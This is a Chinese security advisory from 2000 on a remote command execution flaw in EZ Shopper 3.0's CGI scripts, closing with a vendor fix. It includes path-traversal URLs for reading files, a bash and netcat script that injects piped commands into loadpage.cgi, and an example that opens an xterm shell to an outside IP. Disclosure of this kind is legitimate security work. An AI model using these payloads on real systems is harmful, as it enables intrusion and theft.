首页 -> 安全研究

安全研究

安全漏洞
EZ Shopper 3.0远程执行命令

发布日期:2000-02-26
更新日期:2000-02-28

受影响系统:
EZ Shopper 3.0
描述:
<< 来源:suid@suid.kg >>

    用户可在远程系统上以Web权限执行任意命令。对Web能访问到的文件,用户均可读取。该漏洞是由于CGI的perl代码对输入的数据没作验证,就直接用opern()函数打开。



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

(1) loadpage.cgi - 可查看任意文件。
    首先使用浏览器找到当前路径(cwd):

    http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ

    接着会返回以下错误信息:

    Cannot open file /home/www/shop/XYZ

    接着可以按以上方式查看其他文件:

    http://www.example.com/cgi-bin/loadpage.cgi?ser_id=1&file=../../<path>/<file>

(2) loadpage.cgi - 执行任意命令。
    这个例子的shell代码是通过netcat来和HTTP代理通讯的,代码如下:

        ------------------------CUT------------------------

        #!/bin/bash
        echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?
        user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080

        ------------------------CUT------------------------

    使用的例子如下:
        $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%20123.123.123.123:0
                 
(3) search.cgi - 查看文件(速度比较慢)和执行命令。
    只需简单将数据库的字段替换成命令或是路径(文件名)。

    http://www.example.com/cgi-bin/search.cgi?
    user_id=1&database=<insert here>&template=<or insert here>&distinct=1

    注意:如果你使用的是数据库字段的话,那template处必须是一个有效的模板。反过来一样。


建议:
供应商已经发布了新版本,您可以从他们的站点上下载并安装。
URL: http://www.ahg.com/software.htm#ezshopper


浏览次数:6553
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障